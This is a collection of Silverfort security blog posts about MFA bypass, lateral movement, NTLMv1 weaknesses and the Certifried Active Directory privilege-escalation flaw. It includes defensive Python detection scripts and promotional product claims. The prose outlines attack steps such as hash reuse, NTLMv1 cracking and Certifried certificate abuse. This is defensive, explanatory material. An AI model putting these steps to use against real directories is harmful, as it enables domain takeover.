Today’s security measures must be smart: able to infer the meaning of event patterns, communicate them to other security products and respond accordingly. An MFA push notification that is sent repeatedly and denied every time is a clear indication of suspicious activity. Because MFA is so effective at stopping attacks that use compromised credentials to reach targeted resources, it was only to be expected that threat actors would respond with bypass techniques, which makes protection against those techniques a necessity.

Silverfort Protection: Automated MFA fatigue mitigation

Silverfort provides dedicated protection against MFA fatigue by suppressing push notifications to the user after five consecutive denied access attempts. The user’s risk score is raised immediately so the security team is alerted that the user has been targeted and can act accordingly.

Stage 2: Lateral Movement

The Attack: Accessing a wide range of systems using a compromised account

“After establishing access to the VPN, the attacker then began to use the compromised user account to log on to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.”

The Gap: Lack of MFA for command-line access to systems

Command-line access tools such as PsExec (used in this attack), PowerShell and WMI are the main utilities admins use to access, configure and troubleshoot remote machines. They are also the tools of choice for attackers moving laterally within an environment. Traditional MFA cannot be enforced on these interfaces because of the authentication protocols they use, so there is no way to block, in real time, an attacker who has compromised user credentials. This is the most critical gap in today’s security stack and the main reason lateral movement attacks remain so frequent: the protocols in use have not evolved.

Silverfort Protection: MFA protection across all resources within the environment

Silverfort’s MFA protection applies regardless of the access method (RDP, PsExec, PowerShell, WMI and so on) and deprives attackers of any value from the compromised credentials. Whenever an attacker attempts a malicious login, Silverfort pushes an MFA notification to the actual user, who can deny access outright. This is the first time real-time protection has been introduced into the internal environment.

Stage 1A: Initial Access Revisited

The Attack: Voice phishing luring employees to grant MFA approval

“The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept MFA push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.”

The Gap: MFA as a single point of failure

Humans are the weakest link in any security chain, so security teams should assume that a determined attacker will eventually persuade a user to act insecurely.
This is exactly why protection must be multi-layered: in the Cisco attack, once VPN access was compromised the attackers never had to interact with the user again. Under cover of the compromised account they could, in principle, reach any resource they wanted.

Silverfort Protection: Multi-layered MFA protection on all resources

Silverfort can enforce MFA on any resource, including the Citrix servers and domain controllers targeted in this breach. Even after a successful voice phishing call, the attackers would have had to repeat it every time they wanted to reach a new resource, which would eventually arouse the suspicion of even the most trusting user.

Conclusion: Closing the Gap

Silverfort’s Unified Identity Protection platform addresses a long-standing gap that threat actors have been targeting for over a decade, most recently in the Cisco breach. The takeaway is that real-time, multi-layered protection against lateral movement is a key component of any security architecture. Learn more about Silverfort’s lateral movement protection here.

---
- Published: 2022-08-09
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/deadline-looms-for-compliance-with-ftcs-revamped-data-protection-rule/

On December 9 of last year, while the world braced for another wave of COVID infections, something even more serious, at least in terms of cybersecurity, was happening at the Federal Trade Commission (FTC). After years of incrementally amending its Safeguards Rule (officially the “Standards for Safeguarding Customer Information”, the consumer-protection regulation that implements the Gramm-Leach-Bliley Act of 1999), the FTC quietly dropped a bombshell. Having previously offered only general guidance on how covered institutions were expected to protect consumer information, the FTC suddenly got very granular about every step “non-banking financial institutions” must take to comply.
From putting extensive risk assessment programs in place to implementing security measures like multi-factor authentication (MFA), the FTC was now spelling out exactly what companies needed to do to avoid enforcement action. There was also a hard deadline: December 9, 2022 — one year to the day of the published update. This post examines the implications of this updated rule for businesses, specifically examining the new security requirements and the steps companies need to take. What “Non-Banking” Means Before diving into technical details, it’s important to consider how broad the definition of “non-banking financial institutions” actually is. Clearly, the updated Safeguards Rule applies to companies that explicitly handle financial transactions: mortgage lenders, payday lenders, finance companies, mortgage brokers, account servicers, check cashers, wire transfer companies, collection agencies, credit counselors, tax preparation firms, non-federally insured credit unions, and investment advisors that don’t have to register with the SEC. But the rule potentially affects a much broader range of organizations, including car dealerships, real estate appraisers, retailers that offer their own credit cards, colleges and universities that participate in federal student financial programs, and even career counselors who work with clients in the financial services industry. This is because any company engaged in activities considered “financial in nature” is subject to the Safeguards Rule’s new requirements — particularly what the FTC calls “finders,” which are firms that bring together buyers and sellers but don’t actually handle the transaction. This remarkably wide net means that many companies could be caught by surprise in December, suddenly finding themselves subject to extensive new data protection requirements they weren’t even aware of and unexpectedly facing compliance issues. 
### FTC's MFA Requirements for Compliance

Determining which organizations are subject to the updated Safeguards Rule is just the first hurdle; implementing the specific security controls that the directive dictates is where the real work begins. Here is an overview of nine elements that the FTC will soon require:

1. The designation of a “qualified individual” to implement and supervise a business’ information security program.
2. Risk assessments that identify exactly what customer information is stored, and where it’s stored, and evaluate any foreseeable risks and threats to that data’s security.
3. Safeguards to mitigate identified risks, including implementing access controls, encrypting customer information, and implementing multi-factor authentication (MFA).
4. Continuous monitoring of safeguards, including system-wide scans to test for security vulnerabilities.
5. Mandatory security awareness training for all employees, suppliers, and contractors to ensure readiness.
6. Contracts with service providers that spell out security expectations and build in ways to monitor their work.
7. Regular updates to security programs so they remain current in the face of emerging threats and personnel changes.
8. The creation of a written incident response plan for a security event that results in unauthorized access to or misuse of customer data.
9. Regular reports prepared by the qualified individual and submitted to the company’s board of directors (or governing body).

The level of detail provided here will go a long way toward prodding financially oriented organizations to implement thorough data security programs. Yet in some ways, the FTC hasn’t gone far enough with its update, especially with regard to MFA. Granted, the agency spells out some criteria that MFA solutions should meet, including having a “knowledge factor” (i.e. a password), a “possession factor” (i.e. a token), and an “inherence factor” (i.e. a biometric characteristic).
Every major MFA provider on the market meets these easily. But there is no guidance as to which specific systems MFA should be applied to, and this omission could leave organizations dangerously exposed. Compare this with the directives coming out of cyber insurance companies this year. To qualify for a policy, companies now need to be able to apply MFA to cloud-based email and remote network access, as well as to internal and remote admin access to directory services, network backup environments, network infrastructure (such as firewalls, routers, and switches), and organizational workstations and servers. This is because cyber insurers have skin in the game and are aggressively trying to stem their record losses from 2020 (a loss ratio of up to 72%, according to some studies). The gap between the public sector and the private, that is, an agency’s broad set of guidelines vs. an individual company’s need to be profitable, has never been wider.

### The Importance of MFA Everywhere

What this leads to is a simple conclusion: the FTC has simply not gone far enough in the update to its Safeguards Rule if the goal is comprehensive data protection for consumers. The reason is that traditional MFA solutions cannot actually protect companies against one of the main vectors used in ransomware attacks: command-line access. Command-line access tools such as PsExec, PowerShell, and Windows Management Instrumentation (WMI) are used extensively by IT admins to remotely access the machines they manage. But attackers also use these tools for nefarious purposes, such as moving laterally across an environment once they have compromised user credentials (usually those of an admin). In fact, nearly every recent ransomware attack has employed this exact technique. This means companies could be in full compliance with the FTC while still facing serious vulnerabilities.
Traditional MFA cannot be applied to command-line tools, because the authentication protocols they rely on (Kerberos and NTLM) have no MFA support, and that presents a security challenge. Fortunately, there is a solution available: the Silverfort Unified Identity Protection Platform. Silverfort offers the only product on the market that features continuous monitoring of all authentications for every user, every system, and every environment, both on-prem and in the cloud. That means Silverfort can enforce MFA across an entire IT ecosystem, including every single app, interface, and piece of infrastructure, providing exactly the type of holistic protection of customer data sources (wherever they reside and however they’re accessed) that the FTC aspires to require. That’s good news for everyone: non-banking financial institutions can have confidence that their systems are not just FTC-compliant but fully secure, while consumers can have faith that their confidential data is indeed well protected. Learn more about the Silverfort platform.

---

- Published: 2022-08-04
- Modified: 2025-04-16
- URL: https://www.silverfort.com/blog/cyber-insurance-win-win-brokers-clients/

As cyberattacks continue to escalate in frequency and intensity, so do the stakes for both cyber insurance providers and their clients. To address this rapidly growing threat, brokers have raised the requirements that clients must now meet in order to acquire or renew a comprehensive policy. But these more stringent requirements are proving a challenge for many companies, especially when it comes to complying with the cyber insurance multi-factor authentication (MFA) checklist. The watchword for underwriters today is “MFA everywhere,” but traditional MFA solutions can’t actually protect every resource within the modern hybrid enterprise, especially legacy systems, leaving open arcane attack vectors that cyber criminals are increasingly exploiting.
Fortunately, there are solutions that providers can suggest to clients so they can enforce MFA across their entire organization. This post examines those solutions and proposes next steps both parties can take to prevent attacks and thus reduce the number of claims, decrease premiums, and improve overall security.

### Understanding the Urgency for Cyber Insurance Compliance

The rapid rise of ransomware attacks has created soaring demand for cyber insurance policies to protect companies against financial loss, reputational damage, and legal exposure. But according to a 2021 report from the U.S. Government Accountability Office, less than half of surveyed organizations actually meet the current requirements for cybersecurity insurance, with small and medium businesses facing the biggest compliance challenges. Meanwhile, cyber insurance claims have increased tenfold since 2016, with 2022 registering a 62% year-over-year increase in ransomware complaints over 2021, according to the FBI’s Internet Crime Complaint Center. As a result, insurance providers have tightened policy requirements (for example, regularly including 40-page attestation forms) and raised premiums to mitigate against the increased risk, in some cases declining to offer coverage at all. The upshot is that cyber insurance vendors now require companies to implement more rigorous security protocols in order to be eligible for policies, with a primary focus on enforcing MFA across the entire enterprise. However, this is easier said than done, as many admin interfaces and legacy applications do not natively support MFA. Furthermore, attackers have found ways to circumvent traditional MFA systems by abusing low-level system admin interfaces such as PsExec, PowerShell, Windows Management Instrumentation (WMI), and Remote Desktop Protocol (RDP) in order to steal credentials and propagate ransomware.
### The Essence of the Problem

Cybersecurity insurance providers and companies today face a conundrum: to limit risk, brokers are now requiring every corporate system to have additional authentication procedures in place before they issue a policy; but meeting that requirement appears to be unattainable, as traditional MFA solutions can’t protect many of the legacy systems that organizations still rely on. This, in turn, means organizations can’t purchase the policy they need (and that insurers are eager to sell). As a workaround, some companies are resorting to solutions like installing server or endpoint agents, implementing network changes such as proxies, or even making code changes to the individual legacy applications themselves.

### Finding the Solution

But to make meaningful headway on this issue, it’s actually insurers who can take important steps to alleviate the impasse, first, by helping clients ask several key questions:

- Is your infrastructure hybrid (i.e., both on-premises and cloud)?
- Do you use common access interfaces such as PowerShell, PsExec, or MSI?
- How extensive and distributed is your network?
- Do you already have MFA tools in place that you need to integrate?

Secondly, brokers can recommend solutions that follow established cybersecurity best practices. For example, those that:

- Cover phishing-resistant methods, such as FIDO and PKI-based MFA
- Don’t require costly implementation, since a fast deployment means clients can easily renew an existing cyber insurance policy
- Offer identity protection across both on-prem and cloud resources
- Cover hybrid networks
- Are comprehensive and standalone

Furthermore, they can champion those solutions that make use of important recent innovations, including:

- Agentless and proxyless technology to extend MFA to any resource and access interface across a hybrid environment, including legacy and homegrown applications, command-line access tools, industrial and healthcare systems, file shares, and databases.
- Technology that can deliver unified authentication and access policies across environments, assets, and user types.
- Risk engines that continuously analyze both human and entity-based requests.
- Systems that don’t disrupt the user experience, by triaging MFA requests and elevating sensitive and high-risk situations.

The Silverfort Unified Identity Protection platform meets all of the above criteria, thus presenting a compelling option that brokers can leverage to help clients comply with the new MFA for cyber insurance requirements, such as the ability to apply protocols to legacy applications and command-line access tools. Here’s the full cyber insurance coverage checklist:

As well, Silverfort offers a dedicated program to incentivize insurance brokers to grow their business. This is divided into three partner pillars:

- Recommendations: expedited access for clients to Silverfort experts.
- Referrals: fees or rebates for each client enrolled.
- Resellers: incentives for packaging Silverfort with Endpoint Detection and Response (EDR) solutions, email phishing tools, or other security systems that help clients meet enhanced cybersecurity requirements.

By guiding clients to a comprehensive solution that can truly offer seamless MFA protection across an organization’s tech stack, cybersecurity insurance companies can reduce risk, both for themselves and their clients, while accelerating revenue at the same time. Learn more about Silverfort’s Cyber Insurance solution by reading our eBook.

---

- Published: 2022-08-01
- Modified: 2024-08-15
- URL: https://www.silverfort.com/blog/resolving-the-risks-of-ntlmv1/

Although a key part of cyber resilience is adapting to changes in technology, addressing attack surfaces that have remained constant is equally critical. This is because most enterprises have maintained a significant amount of legacy infrastructure in addition to newer cloud workloads and SaaS applications.
Sometimes this is due to the operational cost of migration, as well as concerns about breaking critical processes by doing so. In other cases, it is simply because the IT team is not even aware of the legacy components’ existence. But whatever the reason, legacy infrastructure is a ripe target for threat actors, as it’s always less secure than its modern alternatives.

In this post we explore a prominent example of legacy infrastructure: the NTLMv1 authentication protocol. This early version of NTLM included critical security weaknesses, enabling attackers to execute a variety of identity-based attacks. And even though it’s now more than 30 years old, it can still be found in production environments, exposing them to risks of compromise that are extremely hard to detect. We’ll then show how Silverfort enables enterprises to overcome the risks from NTLMv1 with discovery, monitoring, and control of every authentication and access attempt that still uses this archaic protocol.

### NTLM Authentication: A Brief History

According to Wikipedia, “In a Windows network, New Technology LAN Manager (NTLM) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager. The NTLM protocol suite is implemented in a Security Support Provider, which combines the LAN Manager authentication protocols NTLMv1, NTLMv2 and NTLM2 in a single package.” (NTLM2 combines both NTLMv1 and NTLMv2.)

NTLMv1 was released back in 1993 and is a challenge-response authentication protocol, which means the authentication process is carried out in three steps:

1. The client machine establishes a network connection to the target server.
2. The server sends a challenge to the client machine.
3. The client machine responds to the challenge, and the server either allows or denies access based on the response.

In 1998, NTLMv2 was released in Windows NT 4.0 SP4 and has been the current version of the protocol ever since.

### General NTLM Security Issues

All versions of NTLM authentication face the following security issues:

- Lack of salting makes the hash password-equivalent, meaning that if you are able to grab the hash value from the server you can then authenticate without knowing the actual password. This means that an attacker who can retrieve a hash (and there are various ways to dump it from a machine’s memory) can then easily access a target server and impersonate the actual user.
- While the server does validate the identity of the client, there is no corresponding validation of the server’s identity, which opens up the possibility of a Man-in-the-Middle (MITM) attack.
- NTLMv1 lacks a client challenge: in an attack on NTLMv1, the attacker can force the client to calculate the NTLMv1 response to a known server challenge. The attacker can then efficiently recover the user’s password by checking the NTLMv1 response against a rainbow table.
- Lack of MFA support deprives the protocol of any protection in the case of a compromised password or hash.

These concerns led Microsoft to replace NTLM with the more secure Kerberos authentication protocol as the default in AD environments, while keeping NTLM as a fallback. But even within NTLM, NTLMv1 is significantly less secure than its successor, NTLMv2.

### What Makes NTLMv1 a Security Risk

The security level of the protocol depends on the challenge: the harder it is to compromise, the more secure the authentication. In the case of NTLMv1, the difference lies in the specific challenges: NTLMv1 produces a challenge with a 16-bit fixed-length number, while NTLMv2 produces challenges of variable lengths. NTLMv1 uses the weak DES algorithm, which is fast to break, making it vulnerable to brute-forcing, while NTLMv2 uses the slower HMAC-MD5, which better resists these attacks since breaking it can’t take place in real time.
Any system that uses NTLMv1 authentication is, therefore, exposed to compromise, since attackers can craft a valid response to the challenge and thus gain access to the system.

With this in mind, it’s easy to understand why IT and security teams want to move away from NTLMv1. In theory, it seems easy: simply find all systems that use NTLMv1 and switch to a more secure protocol. In practice, however, it is much more challenging.

### Obstacles in Detecting and Removing NTLMv1

In an ideal world, there would be some filter that, when clicked, would reveal all the NTLMv1 authentications taking place within an environment. Unfortunately, the reality is not that simple. The most straightforward path is to enable Logon Success Auditing on the domain controller. According to Microsoft’s documentation, each endpoint should then generate an event with the required information: success audit event 4624, whose ‘Package Name (NTLM only)’ field states the NTLM version. However, these logs cannot be collected centrally on the DC and must be retrieved from each individual machine. As well, in many cases the event doesn’t contain the NTLM version data, or hasn’t even been created.

Moreover, in most cases NTLMv1 is found within a legacy application, where NTLMv1 authentication is performed against the app server. As such, there is no assurance that the programmer who coded the application implemented a sound auditing mechanism. If the application runs on a Windows server, it may be partially audited locally, for example if it uses internal Windows libraries such as IIS authentication (for a web server application). However, if the application is completely third-party written, no logs are audited at all. In that case, there is no way to find out whether NTLMv1 is in use without intrusive steps (such as decrypting the packets or analyzing the actual app’s code).
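Once 4624 events have been pulled from each machine (or forwarded to a collector), separating NTLMv1 logons from the rest is a parsing job. The following Python is an added example, not Silverfort’s code: it reads event XML in the layout that Get-WinEvent’s ToXml() or wevtutil export, keeps only 4624 records, and reports confirmed NTLM V1 logons separately from NTLM logons whose ‘Package Name (NTLM only)’ field (LmPackageName in the XML) is absent, so the gap the post describes (events without version data) is surfaced for review instead of being counted as safe. The five records are constructed; the host names, users and addresses are made up.

```python
"""Flag NTLMv1 logons in Windows Security event 4624 records (added example)."""
import xml.etree.ElementTree as ET
from collections import Counter

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _event_xml(computer, user, domain, logon_type, auth_pkg, lm_pkg, ip, ws, event_id=4624):
    """Build a constructed record with the same element layout as exported event XML.

    Field names follow the real 4624 schema; LmPackageName is the field that Event
    Viewer renders as "Package Name (NTLM only)". Pass lm_pkg=None to omit it.
    """
    lm = "" if lm_pkg is None else f'<Data Name="LmPackageName">{lm_pkg}</Data>'
    return f"""<Event xmlns="{EVT_NS['e']}">
  <System><EventID>{event_id}</EventID><Computer>{computer}</Computer></System>
  <EventData>
    <Data Name="TargetUserName">{user}</Data>
    <Data Name="TargetDomainName">{domain}</Data>
    <Data Name="LogonType">{logon_type}</Data>
    <Data Name="AuthenticationPackageName">{auth_pkg}</Data>
    {lm}
    <Data Name="IpAddress">{ip}</Data>
    <Data Name="WorkstationName">{ws}</Data>
  </EventData>
</Event>"""


# Constructed sample: what a collector might hold after pulling logs from two servers.
SAMPLE_EVENTS = [
    _event_xml("APP01.corp.example", "svc_legacy", "CORP", 3, "NTLM", "NTLM V1", "10.0.5.23", "OLDAPP-CLIENT"),
    _event_xml("APP01.corp.example", "jdoe", "CORP", 3, "NTLM", "NTLM V2", "10.0.5.40", "WS-JDOE"),
    _event_xml("FS02.corp.example", "jdoe", "CORP", 3, "Kerberos", "-", "10.0.5.40", "WS-JDOE"),
    # NTLM logon whose version field is missing: the case the post warns about
    _event_xml("FS02.corp.example", "scanner", "CORP", 3, "NTLM", None, "10.0.9.9", "MFP-LOBBY"),
    # A failed logon (4625) is not in scope for this check
    _event_xml("FS02.corp.example", "jdoe", "CORP", 3, "NTLM", "NTLM V1", "10.0.5.40", "WS-JDOE", event_id=4625),
]


def parse_logon(xml_text):
    """Return the fields we need from one event, or None if it is not a 4624."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=EVT_NS) != "4624":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}
    return {
        "computer": root.findtext("e:System/e:Computer", namespaces=EVT_NS),
        "user": data.get("TargetDomainName", "") + "\\" + data.get("TargetUserName", ""),
        "logon_type": data.get("LogonType", ""),
        "auth_pkg": data.get("AuthenticationPackageName", ""),
        "lm_pkg": data.get("LmPackageName"),  # None when the field is absent from the event
        "source_ip": data.get("IpAddress", ""),
        "workstation": data.get("WorkstationName", ""),
    }


def classify(logon):
    """'ntlmv1', 'ntlmv2', 'kerberos', or 'ntlm-unknown-version' for NTLM without version data."""
    if logon["auth_pkg"] != "NTLM":
        return logon["auth_pkg"].lower()
    lm = (logon["lm_pkg"] or "").upper()
    if lm == "NTLM V1":
        return "ntlmv1"
    if lm == "NTLM V2":
        return "ntlmv2"
    return "ntlm-unknown-version"


def find_ntlmv1(xml_records):
    """Logons to review: confirmed NTLMv1 plus NTLM logons whose version the event does not record."""
    hits = []
    for rec in xml_records:
        logon = parse_logon(rec)
        if logon is None:
            continue
        kind = classify(logon)
        if kind in ("ntlmv1", "ntlm-unknown-version"):
            hits.append({**logon, "kind": kind})
    return hits


def count_by_host(hits):
    """How many flagged logons each server saw; a starting list for the disable-or-MFA decision."""
    return dict(Counter(h["computer"] for h in hits))


if __name__ == "__main__":
    for h in find_ntlmv1(SAMPLE_EVENTS):
        print(f"{h['kind']:22} {h['computer']:20} {h['user']:18} from {h['source_ip']} ({h['workstation']})")
    print(count_by_host(find_ntlmv1(SAMPLE_EVENTS)))
```

The version-less NTLM logon is reported as its own category on purpose: the post notes that many events lack the version data, and an NTLM logon with no recorded version is exactly the record that needs a second look before a server is declared NTLMv1-free.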
While NTLMv1 authentications can be partially detected using network-level inspection, in most cases this traffic is encrypted, which rules that out. So the challenge lies not only in the inherent insecurity of NTLMv1 itself but also in the difficulty of determining whether it’s being used within a given environment.

### Silverfort’s Protection for the NTLMv1 Attack Surface

The Silverfort Unified Identity Protection platform provides organizations with the unique ability not only to discover all NTLMv1 authentications within an environment but to actively block them as well. Silverfort’s analysis engine detects NTLMv1 authentications and flags them with a risk indicator. This risk indicator can be used both as a filter to discover machines that perform such authentications and as an access policy trigger. Let’s see how it looks within the Silverfort console:

#### Discovery

Within the Authentication Logs screen, check the NTLMv1 Authentication box. Once checked, all matching authentications are displayed, providing actionable knowledge about which machines are using NTLMv1 to help decide whether to disable them.

NTLMv1 enabled in Silverfort’s Authentication Logs screen

#### Protection

In a similar manner, Silverfort enables the use of the NTLMv1 risk indicator as a trigger to activate an access policy. The action would then be either:

Deny: choose this option if you don’t want to allow NTLMv1 at all within the environment, as an additional precautionary measure.

Silverfort policy to deny access via NTLMv1

MFA: choose this option if for any reason you can’t eliminate the use of NTLMv1 (for example, if there is an old application that might break and endanger critical business processes). In this case, even if the authentication flow is compromised, the true user must verify their identity via MFA in order to gain access, effectively disarming attackers’ ability to leverage the protocol’s weaknesses for malicious access.
Silverfort policy to require MFA step-up when authenticating via NTLMv1

### The Path to Comprehensive Security

In today’s hybrid environment there are many types of systems existing side by side, so comprehensive security means monitoring and protecting all of them. NTLMv1 is just one example of the issues with legacy systems; it’s also important to understand that when the security weakness resides in the legacy infrastructure, a compromise there can enable attackers to gain access to other parts of the environment as well. The right way to think of it is not so much securing legacy systems but rather preventing legacy systems from becoming the gateway to your environment.

Silverfort’s Unified Identity Protection is the first platform purpose-built to protect against identity threats across the entire hybrid enterprise, whether the targeted resource is a SaaS application, a cloud workload, or an on-prem server. Silverfort extends MFA and modern identity security to all core resources that couldn’t be protected before, including NTLMv1. Is NTLMv1 an attack surface you want to address? Schedule a meeting with one of our experts here.

---

- Published: 2022-07-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-proactively-detects-protects-against-certifried-attacks/

In early May 2022, the Certifried (CVE-2022-26923) vulnerability was published. This vulnerability abuses the Kerberos certificate extension and its Active Directory elements. It’s a privilege escalation vulnerability in which a low-privileged (“weak”) user gains domain admin privileges in an Active Directory environment.

### How does it work?

The Certifried vulnerability allows an attacker to elevate privileges from a weak user to a domain admin. In short, each user can create up to 10 machine accounts in a domain. An attacker can rename one of these machine accounts to the target’s computer name and request a malicious certificate on its behalf.
Next, the attacker can authenticate as the target computer using the crafted certificate and run malicious code with high privileges. The vulnerability has a wide impact due to its minimal prerequisites: all it requires is a connection to the network and a weak user.

Each identity in AD has attributes. Some of them are unique across the domain, e.g. the Service Principal Name (SPN), and some can have duplicates. The attacker creates a weak machine account, abuses its dNSHostName attribute and alters it to the target’s hostname. The attacker then requests a certificate with a Subject Alternative Name (SAN) identical to the target’s hostname. Normally, this attack flow cannot be completed, because a changed dNSHostName must remain consistent with the server’s SPNs. However, if the SPNs are deleted, that constraint no longer applies and the dNSHostName can be changed.

The vulnerability also deals with how the domain controller maps a certificate to the identity object in Active Directory during the authentication process. It is possible to request a certificate for Client Authentication purposes and embed the dNSHostName as the SAN. The returned certificate can now be used to authenticate to the domain controller using the PKINIT extension, and the holder is identified as the target host. One way to exploit this vulnerability is to authenticate to Active Directory as a target domain controller, and use that to steal the credentials of all the users in the domain.

### Mitigation

Microsoft released the May 10 patch for Windows Servers to add another layer of protection to certificate creation and authentication. However, it only applies to certificates requested after patch installation. Enforcement mode will begin by May 9, 2023. The Silverfort Unified Protection Platform has the capability to inform you of ongoing Certifried attacks, in case any malicious certificates were created before the patch.
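The flow above leaves traces in the directory itself: a machine account whose dNSHostName no longer matches its own name, a second account claiming a hostname that already belongs to another computer (at worst a domain controller), SPNs out of step with dNSHostName or removed altogether, and an account that a regular user created through the machine-account quota. The following Python audit is an added example, not Silverfort’s code, that checks a set of computer objects for those inconsistencies. The records are constructed; the attribute names (sAMAccountName, dNSHostName, servicePrincipalName, mS-DS-CreatorSID) are the real AD ones, but in a real run they would be filled from an LDAP query rather than typed in.

```python
"""Audit AD computer objects for Certifried-style dNSHostName/SPN inconsistencies (added example)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ComputerObject:
    """Subset of AD computer attributes; the values used below are constructed."""
    sam_account_name: str                          # sAMAccountName, e.g. "DC01$"
    dns_host_name: Optional[str]                   # dNSHostName
    spns: List[str] = field(default_factory=list)  # servicePrincipalName
    creator_sid: Optional[str] = None              # mS-DS-CreatorSID: set when a non-admin used the quota
    is_domain_controller: bool = False


SAMPLE_COMPUTERS = [
    ComputerObject("DC01$", "dc01.corp.example",
                   ["HOST/dc01.corp.example", "ldap/dc01.corp.example"], None, True),
    ComputerObject("WS-ALICE$", "ws-alice.corp.example",
                   ["HOST/ws-alice.corp.example", "HOST/WS-ALICE"], "S-1-5-21-1111-2222-3333-1105"),
    # Quota-created account renamed to the DC's hostname with its SPNs cleared
    ComputerObject("DESKTOP-7X2$", "dc01.corp.example", [], "S-1-5-21-1111-2222-3333-1190"),
    ComputerObject("PRINT01$", None, ["HOST/PRINT01"]),
]


def _finding(c, check, severity, detail):
    return {"account": c.sam_account_name, "check": check, "severity": severity, "detail": detail}


def audit_computers(computers):
    """Return one finding per failed check, in account order and then check order."""
    findings = []
    by_dns = defaultdict(list)
    for c in computers:
        if c.dns_host_name:
            by_dns[c.dns_host_name.lower()].append(c)

    for c in computers:
        short = c.sam_account_name.rstrip("$").lower()
        if c.dns_host_name:
            fqdn = c.dns_host_name.lower()
            # 1. dNSHostName is normally derived from the account name
            if fqdn.split(".")[0] != short:
                findings.append(_finding(c, "dnshostname-mismatch", "high", c.dns_host_name))
            # 2. two accounts claiming the same hostname; worst case the twin is a DC
            twins = [o for o in by_dns[fqdn] if o is not c]
            if twins:
                sev = "critical" if any(o.is_domain_controller for o in twins) else "high"
                findings.append(_finding(c, "duplicate-dnshostname", sev,
                                         ", ".join(o.sam_account_name for o in twins)))
            # 3. SPN host parts are normally kept in sync with dNSHostName
            for spn in c.spns:
                host = spn.split("/", 1)[1].split(":")[0].split("/")[0].lower()
                if host not in (fqdn, short):
                    findings.append(_finding(c, "spn-host-mismatch", "medium", spn))
        # 4. a domain-joined host with no SPNs at all is unusual
        if not c.spns:
            findings.append(_finding(c, "no-spns", "medium", "servicePrincipalName is empty"))
        # 5. account created through ms-DS-MachineAccountQuota by a regular user
        if c.creator_sid:
            findings.append(_finding(c, "created-by-non-admin", "info", c.creator_sid))
    return findings


def accounts_to_investigate(findings, min_severity="high"):
    """Sorted account names carrying at least one finding at or above min_severity."""
    rank = {"info": 0, "medium": 1, "high": 2, "critical": 3}
    return sorted({f["account"] for f in findings if rank[f["severity"]] >= rank[min_severity]})


if __name__ == "__main__":
    results = audit_computers(SAMPLE_COMPUTERS)
    for f in results:
        print(f"{f['severity']:8} {f['account']:14} {f['check']:24} {f['detail']}")
    print("investigate:", accounts_to_investigate(results))
```

Note that the legitimate DC01$ also receives a finding: when two objects claim one hostname, both sides are reported, because the defender’s question is which of the two is the impostor, and the quota-creator SID is the usual tie-breaker.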
This latest security guideline regarding Certifried provides detailed instructions on how to defend against a Certifried attack. We created a simple PowerShell script to automatically collect all the data needed for creating a custom filter with Silverfort. Please run the following command on a domain workstation:

```powershell
# Collect the name and IPv4 address of every domain controller in the domain
$dc_list = Get-ADDomainController -Filter * | Select-Object Name, IPv4Address

# Print the Silverfort console URL that opens the Authentication Logs screen with the
# DC addresses, DC names and the krbtgt service pre-filled as filters.
# Replace <SILVERFORT_CONSOLE> with your Silverfort console host name.
Write-Output "https://<SILVERFORT_CONSOLE>/Logs?deviceOrServer=$($dc_list.IPv4Address -join ',')&excludedFilters=deviceOrServer&includeSources=$($dc_list.Name.ToLower() -join ',')&service=krbtgt"
```

Replace `<SILVERFORT_CONSOLE>` with your Silverfort console URL. Then:

1. Paste the output in your browser and log in.
2. Add any known source IP addresses your domain controllers may be using, if they are missing from the automatically generated list, e.g. addresses of NAT devices.
3. Click Save Filters, give it a name and click Save.
4. Now that the filters are created, click the cogwheel at the top right of the screen, then select CUSTOM REPORTS.
5. Fill in the required details, select the two newly created filters and click Save.

You will receive regular reports about Certifried exploits regarding all your domain controllers. If this filter produces any authentication results, your environment may be under attack. In this case, the domain controllers appearing in the logs might have been compromised and need to be examined. Please verify for each authentication that the source hostname matches the source IP. If the IP is unfamiliar, there might be an attempted Certifried attack in your environment. Reach out to us if you need any assistance.

---

- Published: 2022-04-12
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-raises-65m-in-series-c-funding/

We’re very excited to announce that we’ve raised $65M in Series C funding! A few words about what this milestone really means: We all know that identities have become the most vulnerable attack surface in enterprises, just because they’re the easiest to target.
Yet even though every organization seems to have a solution in place, these attacks persist in dominating the threat landscape. It’s taken a while for the market to understand the depth of the problem. But our rapid growth and customer adoption, and this new round of funding, are demonstrating that we’re solving a major problem from which almost every organization suffers: identity-based attacks. Cyber attacks that leverage compromised user identities and credentials are now used in 80% of all data breaches and ransomware campaigns. This happens because enterprise identity is currently built in silos across different environments, providing inconsistent and insufficient security controls for many types of corporate resources, and ultimately is unable to provide full protection across all users, systems, and environments.

Where do we come in? Using unique technology, Silverfort enables Identity Threat Detection and Response (ITDR), Identity Threat Prevention (ITP), Multi-Factor Authentication (MFA), and Zero Trust security policies as a unified and transparent layer on top of all current IAM solutions, both legacy and modern. It extends identity threat protection across all sensitive corporate and cloud assets, without requiring any agents, proxies, or code changes. Silverfort extends protection even to systems and access interfaces that couldn’t be protected by any other product until today, and which currently enable attackers to bypass all other MFA and identity security solutions (for example, command-line interfaces such as Remote PowerShell and PsExec, legacy applications, industrial systems, machine-to-machine access).

In other words, the time is right for us to emerge as the independent, vendor-agnostic, unified security layer that works on top of all IAM platforms... the first Unified Identity Threat Protection company. This is why we’re growing like crazy. Over the past year we’ve almost tripled our customer base, revenues and headcount.
And the momentum is only growing stronger. We appreciate your support, and we invite you to see a demo of our platform, or to join our team.

Best wishes,
The Silverfort Team

---

- Published: 2022-04-10
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-okta-breach-lessons-only-the-attackers-can-teach/

